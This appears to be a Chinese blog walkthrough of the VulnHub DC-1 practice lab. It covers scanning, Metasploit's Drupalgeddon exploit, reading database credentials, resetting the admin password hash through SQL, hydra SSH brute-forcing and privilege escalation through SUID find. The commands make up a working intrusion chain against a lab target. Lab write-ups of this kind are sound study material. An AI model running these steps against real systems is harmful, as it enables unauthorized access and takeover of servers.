DC系列:1 (DC-1靶机,初级渗透详细教程)

find提权详解
find详解.

环境搭建

详情

名称DC- 1
发布日期2019年2月28日
作者DCAU
系列DC
网页https://www.vulnhub.com/entry/dc-1,292/

描述

DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。

它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。

要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot
Security OS上找到的工具。

有多种方法可以获得根,但是,我包含了一些包含初学者线索的标志。

总共有五个标志,但最终目标是在root的主目录中找到并读取标志。您甚至不需要成为 root 用户即可执行此操作,但是,您将需要 root
用户权限。

根据您的技能水平,您可以跳过查找这些标志中的大多数,直接找到root。

初学者可能会遇到他们以前从未遇到过的挑战,但是Google搜索应该是获取完成此挑战所需的信息所需的全部内容。

使用工具

攻击者:kali 192.168.10.153
靶机:dc-1 192.168.10.157

一:信息收集

基础信息查询

0x01 查看存活主机

arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探

在这里插入图片描述

0x02 查看开放端口

masscan --rate=10000 --ports 0-65535 192.168.10.157

在这里插入图片描述

0x03 查看端口服务

nmap -sV -T4 -O -p 80,111,22 192.168.10.157

在这里插入图片描述

查询发现,目标靶机开放ssh远程连接服务,HTTP服务,rpcbind服务(此服务可用利用,形成资源占用攻击,这里用处不大但要知道)

0x04 扫描网站根目录及指纹信息

whatweb http://192.168.10.157 扫描网站指纹信息

在这里插入图片描述
可以发现,目标靶机的CMS建站系统为Drupal 7 可以尝试查看对应的版本漏洞

dirb http://192.168.10.157 /usr/share/dirb/wordlists/big,txt

在这里插入图片描述

0x05 访问开放网页

发现一个登录窗口,尝试SQL注入失败,尝试其他方法
在这里插入图片描述

二:漏洞发现

msf漏洞查询

0x01 启动msf

msfconsole
search Drupal 7 

在这里插入图片描述
一个个尝试着使用(Rank 为excellent的成功概率大一点,比较好用)

use auxiliary/gather/drupal_openid_xxe
set lhost 192.168.10.157
set Rhosts 192.168.10.157
show options 
run

在这里插入图片描述
第一个漏洞失败,经尝试发现,exploit/multi/http/drupal_drupageddon
这个漏洞可以利用成功
在这里插入图片描述
在这里插入图片描述
shell 后,python -c 'import pty;pty.spawn("/bin/bash")'开启终端
在这里插入图片描述

0x02 flag1

可以在/var/www 目录下查找到flag1
在这里插入图片描述
flag提示我们查看config配置文件,
百度之后发现,Drupal的配置文件(settings.php)在sites/default/files 中
cd到sites/default/中查看

0x03 flag2

查找到MySQL数据库账户及密码,尝试登录查找信息
在这里插入图片描述

0x04 查询数据库信息

mysql -u dbuser -p R0ck3t

在这里插入图片描述
登录成功,查询账号密码

show databases;
use drupaldb
show tables;
select* from users;

在这里插入图片描述
查询到账户密码,这里的密码为密文加密,尝试使用md5解密,发现解密失败

三:漏洞利用

ssh远程连接漏洞

0x01 破解密码加密

法一:
在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,使用此方法简便了破解admin的密码,更为直接。
在这里插入图片描述
查看数据库信息:
在这里插入图片描述
新用户 admin2 admin2创建成功,可以进行登陆

方法二:
drupal可以利用Drupal对数据库的加密方法,加密脚本位置在网站根目录下的scripts下
使用加密脚本加密新密码:qwer,生成加密密文,将所得密文替换MySQL数据库中的原有密文,实现密码更新

find -name password_hash* 查找到文件的存在位置

在这里插入图片描述

srcipt/password-hash.sh qwer 将加密结果更新到数据库中,即可登录

在这里插入图片描述

update users set 
password='$S$DIMTIl9Ae8pGs0FNqTaQ06uFIe
/xYadkJCoQJaLaFzLXZej/SAAp'
where uid=1;    更新admin账户的密码,尝试登录

在这里插入图片描述

0x02 flag3

登录查看flag3,提示到 find提权,-exec shadow文件 passwd文件
在这里插入图片描述
查看passwd文件,发现flag4是一个用户
在这里插入图片描述

0x03 爆破flag4用户密码

gzip -d rockyou.tar 解压密码字典
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.157      
尝试爆破flag4的密码

在这里插入图片描述
爆破成功,密码为orange

0x04 ssh远程连接

在这里插入图片描述

0x05 flag4

其实完全不需要ssh远程连接即可查看到flag4(flag4是一个用户,则cd/home/flag4 查看其中有无flag文件,查找到flag4.txt)
在这里插入图片描述

四:提权

根据flag3中提示可以find提权

使用find命令查找有特殊权限suid的命令
在这里插入图片描述
发现find具有su权限,尝试使用find提权

find / -name 233 -exec "/bin/sh" \;

在这里插入图片描述
提权成功,找到flag5,渗透结束

总结

此次渗透,考察ssh爆破,drupal文件配置路径信息,find提权用法等知识点,多多练习,百炼成钢。

  • 11
    点赞
  • 60
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值